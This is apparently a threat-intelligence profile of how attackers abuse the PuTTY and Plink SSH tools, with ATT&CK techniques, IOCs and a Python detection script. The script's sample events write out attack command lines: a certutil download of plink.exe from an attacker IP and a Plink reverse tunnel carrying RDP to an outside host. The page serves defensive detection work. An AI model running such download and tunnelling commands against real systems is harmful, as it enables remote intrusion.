PuTTY
PuTTY is a publicly available SSH client and related remote access utility suite that includes components such as Plink (PuTTY Link). In the provided reporting, it appears primarily as a legitimate dual-use tool abused by multiple threat actors rather than as a distinct malware family.

North Korea-linked actors including Stonefly/Andariel/Onyx Sleet and Moonstone Sleet have used PuTTY or trojanized PuTTY in operations. Microsoft reported that in early August 2023 Moonstone Sleet delivered a trojanized version of PuTTY via LinkedIn, Telegram, and developer freelancing platforms; the lure often used a ZIP containing putty.exe and url.txt with an IP address and password, and entering those values caused the trojanized binary to decrypt and execute an embedded payload, initiating a multi-stage chain involving SplitLoader and follow-on loaders. Separately, reporting on Andariel states the group has used PuTTY and WinSCP to exfiltrate data to North Korea-controlled servers via FTP and other protocols, and Symantec observed Stonefly using PuTTY and Plink for SSH connectivity during financially motivated intrusions.

Arctic Wolf also documented threat actors exploiting Qlik Sense to deploy Cactus ransomware tooling, including downloading a Plink binary renamed to putty.exe, using it to establish an RDP tunnel over SSH on port 443 with remote forwarding to 127.0.0.1:3389 via 45.61.147[.]176:50400; related infrastructure and payload locations included zohoservice[.]net, 216.107.136[.]46, and 144.172.122[.]30, and Arctic Wolf provided SHA-256 828e81aa16b2851561fff6d3127663ea2d1d68571f06cbd732fdf5672086924d for the observed Plink sample. Cisco Talos also noted PuTTY was used for credential exfiltration in the first wave of the 2023 ToyMaker/UNC961 campaign before a later handoff to the Cactus ransomware group.
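A small detection pass over Sysmon-style process-creation events for the Plink/PuTTY patterns described above: a renamed Plink binary, an SSH remote forward whose destination is RDP (3389) over port 443, a certutil download of plink.exe, and the SHA-256 Arctic Wolf reported. This is an added example, not code from the page's sources; the field names (Image, CommandLine, OriginalFileName, Hashes) follow Sysmon Event ID 1, and the sample events are constructed, not captured telemetry.

```python
# Detection pass for the PuTTY/Plink abuse patterns above (added example; field
# names follow Sysmon Event ID 1 and the sample events are constructed).
import re

PUTTY_SUITE = {"putty.exe", "plink.exe", "pscp.exe"}
# SHA-256 Arctic Wolf reported for the renamed Plink sample (value from the page)
KNOWN_PLINK_SHA256 = "828e81aa16b2851561fff6d3127663ea2d1d68571f06cbd732fdf5672086924d"
# Plink remote forward syntax is -R [listen-addr:]port:host:port; flag any forward
# whose destination port is 3389, i.e. RDP tunneled over SSH as in the Cactus case
RDP_TUNNEL = re.compile(r"-R\s+\S*:3389\b", re.IGNORECASE)
CERTUTIL_PLINK = re.compile(r"\bcertutil(\.exe)?\b.*\bplink\.exe", re.IGNORECASE)

def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def sha256_of(hashes: str) -> str:
    # Sysmon packs hashes as "SHA256=...,MD5=..."; return the SHA256 value if present
    for part in hashes.split(","):
        key, _, value = part.partition("=")
        if key.strip().upper() == "SHA256":
            return value.strip().lower()
    return ""

def classify(ev: dict[str, str]) -> list[str]:
    """Return the findings for one process-creation event (empty list if benign)."""
    findings = []
    img = basename(ev.get("Image", ""))
    orig = ev.get("OriginalFileName", "").lower()
    cmd = ev.get("CommandLine", "")
    if sha256_of(ev.get("Hashes", "")) == KNOWN_PLINK_SHA256:
        findings.append("known_plink_hash")
    # On-disk name differs from the PE version-info name: Plink renamed to putty.exe
    # (assumes OriginalFileName is populated and starts with "plink" for Plink builds)
    if orig.startswith("plink") and img != "plink.exe":
        findings.append("renamed_plink")
    if img in PUTTY_SUITE and RDP_TUNNEL.search(cmd):
        findings.append("ssh_tunnel_to_rdp")
    if CERTUTIL_PLINK.search(cmd):
        findings.append("certutil_download_plink")
    return findings

# Constructed sample events mirroring the page's reporting (not real telemetry)
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\Public\putty.exe", "OriginalFileName": "plink",
     "CommandLine": "putty.exe -ssh -P 443 -R 50400:127.0.0.1:3389 45.61.147.176",
     "Hashes": "SHA256=" + KNOWN_PLINK_SHA256},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil.exe -urlcache -f http://130.185.75.198:8000/plink.exe plink.exe",
     "Hashes": ""},
    {"Image": r"C:\Program Files\PuTTY\putty.exe", "OriginalFileName": "PuTTY",
     "CommandLine": "putty.exe -ssh admin@jumphost.corp.example", "Hashes": ""},
]
```

The third event is a legitimately installed PuTTY session and produces no finding, which is the baseline the other three checks are meant to separate from.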
Groups observed using it
3 distinct threat actors attributed by public researchers.
Differences in TTPs... operators conducting initial access relied on PuTTY for credential exfiltration...
Microsoft observed Moonstone Sleet delivering a trojanized version of PuTTY
Techniques & procedures
16 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
3 techniques
T1583 Acquire Infrastructure
QuadSwitcher acquired infrastructure to host their tooling.
The content repeatedly states that threat actors 'obtained,' 'acquired,' or 'used' publicly available, open-source, legitimate, or modified tools such as Mimikatz, Cobalt Strike, PsExec, Empire, Impacket, and many others.
T1608.002 Stage Capabilities: Upload Tool
The Play gang uploaded the third-party tools it uses to a dedicated server to be used during intrusions.
Persistence
1 technique
Stealth
2 techniques
In the case of the DLL, the executable is a PuTTY client with a valid code-signing certificate. The binary distributed via JavaScript is an Inno Setup installer for an Electron application.
At the end of August 2024, QuadSwitcher compromised a technology company in Western Europe, downloading PuTTY from http://130.185.75[.]198:8000/plink.exe using certutil.exe ... The threat actor also downloaded MeshAgent ... also via certutil.exe.
Defense Impairment
1 technique
Credential Access
1 technique
Credential theft is a primary objective. The group uses various techniques to perform this core function, including dumping the Local Security Authority Subsystem Service (LSASS) memory and exfiltrating the NTDS.dit Active Directory database, and capturing credentials stored in browsers and SSH clients like PuTTY and OpenSSH.
Lateral Movement
2 techniques
"The threat actor used RDP with valid account credentials for lateral movement..."
The threat actor used Plink and PuTTY for lateral movement. Artifacts of Plink's encrypted sessions were present in the system registry hive.
Command and Control
4 techniques
T1071 Application Layer Protocol
In Play intrusions, payloads are retrieved via HTTP.
MirrorFace has used the PuTTY suite's Secure Copy Protocol (SCP) client for file transfer.
INC Ransom has used AnyDesk and PuTTY on compromised systems.
“They also use tunneling tools such as 3Proxy, PLINK, and Stunnel... [T1090, T1071].”
Exfiltration
3 techniques
ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as PuTTY and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
“...used the utilities PuTTY and WinSCP to exfiltrate data... via File Transfer Protocol (FTP) and other protocols [T1048].”
"Cloud storage misuse: Operators have logged into cloud storage services such as MEGA directly from compromised networks, uploading data with tools like WinSCP and PuTTY."
IOCs tracked for this family
3 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
6 sources tracked across advisories, community write-ups, and news.
Legitimate SSH/Telnet client abused during intrusions for interactive access and (in this case) credential exfiltration workflows.
SSH client abused for remote access and management of compromised systems during the intrusions.
Legitimate SSH client used for remote access/administration; commonly abused by threat actors for interactive access.
Legitimate SSH/terminal client used as a trojanized initial access vector; decrypts an embedded payload when the victim enters provided IP/password, initiating a staged loader chain (including SplitLoader).